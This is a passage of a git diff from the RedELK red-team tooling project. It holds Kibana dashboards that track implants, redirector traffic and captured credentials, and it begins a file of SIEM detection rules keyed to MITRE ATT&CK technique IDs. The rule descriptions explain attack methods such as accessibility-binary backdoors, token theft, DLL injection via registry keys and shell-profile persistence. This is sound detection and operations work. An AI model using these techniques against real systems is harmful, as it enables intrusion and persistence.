\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic All\"}"}, "coreMigrationVersion": "7.16.3", "id": "e97f6f10-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 187], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Implant per top users with computers", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"horizontal_bar\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":50,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Computername\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false,\"style\":{\"color\":\"#eee\"}},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":200},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-2\",\"name\":\"BottomAxis-1\",\"type\":\"value\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":75,\"filter\":true,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-2\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Implant per top users with computers\"}"}, "coreMigrationVersion": "7.16.3", "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171875895, 190], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Total hits\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":true,\"otherBucketLabel\":\"Other IPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Alarmed IPs\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Total hits\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Total hits\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Redirector traffic alarmed IP over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 192], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":64,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Tactics tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 194], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials per realm tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"creds.realm.keyword\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Credentials per realm tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 196], "type": "visualization", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_siem_detection_rules.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_siem_detection_rules.ndjson new file mode 100644 index 00000000..4b79e7e7 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_siem_detection_rules.ndjson @@ -0,0 +1,266 @@ +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence by executing malicious content triggered by a user’s shell. ~/.bash_profile and ~/.bashrc are shell scripts that contain shell commands. These files are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly.\n~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), the ~/.bash_profile script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the ~/.bashrc script is executed. This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment.\nThe macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling ~/.bash_profile each time instead of ~/.bashrc.\nAdversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1156","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1156] .bash_profile and .bashrc","query":"threat.technique.id: T1156","references":["https://attack.mitre.org/techniques/T1156","https://attack.mitre.org/techniques/T1546/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1156","name":".bash_profile and .bashrc","id":"T1156"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. Token Impersonation/Theft) or used to spawn a new process (i.e. Create Process with Token). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.[1]\nAny standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1134","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1134] Access Token Manipulation","query":"threat.technique.id: T1134","references":["https://attack.mitre.org/techniques/T1134"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1134","name":"Access Token Manipulation","id":"T1134"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1134","name":"Access Token Manipulation","id":"T1134"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. [1]\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). [2] The Image File Execution Options Injection debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges. [3]\nOther accessibility features exist that may also be leveraged in a similar fashion: [2][4]\nOn-Screen Keyboard: C:\\Windows\\System32\\osk.exe\nMagnifier: C:\\Windows\\System32\\Magnify.exe\nNarrator: C:\\Windows\\System32\\Narrator.exe\nDisplay Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\nApp Switcher: C:\\Windows\\System32\\AtBroker.exe","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1015","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1015] Accessibility Features","query":"threat.technique.id: T1015","references":["https://attack.mitre.org/techniques/T1015","https://attack.mitre.org/techniques/T1546/008"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1015","name":"Accessibility Features","id":"T1015"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1015","name":"Accessibility Features","id":"T1015"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\nAdversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.[1][2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1531","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1531] Account Access Removal","query":"threat.technique.id: T1531","references":["https://attack.mitre.org/techniques/T1531"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1531","name":"Account Access Removal","id":"T1531"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1087","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1087] Account Discovery","query":"threat.technique.id: T1087","references":["https://attack.mitre.org/techniques/T1087"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1087","name":"Account Discovery","id":"T1087"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1098","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1098] Account Manipulation","query":"threat.technique.id: T1098","references":["https://attack.mitre.org/techniques/T1098"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1098","name":"Account Manipulation","id":"T1098"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1098","name":"Account Manipulation","id":"T1098"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\ are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. [1]\nSimilar to Process Injection, this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1182","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1182] AppCert DLLs","query":"threat.technique.id: T1182","references":["https://attack.mitre.org/techniques/T1182","https://attack.mitre.org/techniques/T1546/009"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1182","name":"AppCert DLLs","id":"T1182"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1182","name":"AppCert DLLs","id":"T1182"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. [1]\nSimilar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. [2] Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity.\nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1103","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1103] AppInit DLLs","query":"threat.technique.id: T1103","references":["https://attack.mitre.org/techniques/T1103","https://attack.mitre.org/techniques/T1546/010"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1103","name":"AppInit DLLs","id":"T1103"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1103","name":"AppInit DLLs","id":"T1103"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. [1] These AppleEvent messages can be easily scripted with AppleScript for local or remote execution.\nosascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.\nAdversaries can use this to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via Python[2]. Scripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\".","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1155","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1155] AppleScript","query":"threat.technique.id: T1155","references":["https://attack.mitre.org/techniques/T1155","https://attack.mitre.org/techniques/T1059/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1155","name":"AppleScript","id":"T1155"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1155","name":"AppleScript","id":"T1155"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).[1] OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.[2]\nFor example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.[3] With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.[4]\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1527","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1527] Application Access Token","query":"threat.technique.id: T1527","references":["https://attack.mitre.org/techniques/T1527","https://attack.mitre.org/techniques/T1550/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1527","name":"Application Access Token","id":"T1527"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1527","name":"Application Access Token","id":"T1527"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.).\nAccess to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1017","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1017] Application Deployment Software","query":"threat.technique.id: T1017","references":["https://attack.mitre.org/techniques/T1017","https://attack.mitre.org/techniques/T1072"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1017","name":"Application Deployment Software","id":"T1017"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1010","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1010] Application Window Discovery","query":"threat.technique.id: T1010","references":["https://attack.mitre.org/techniques/T1010"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1010","name":"Application Window Discovery","id":"T1010"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that 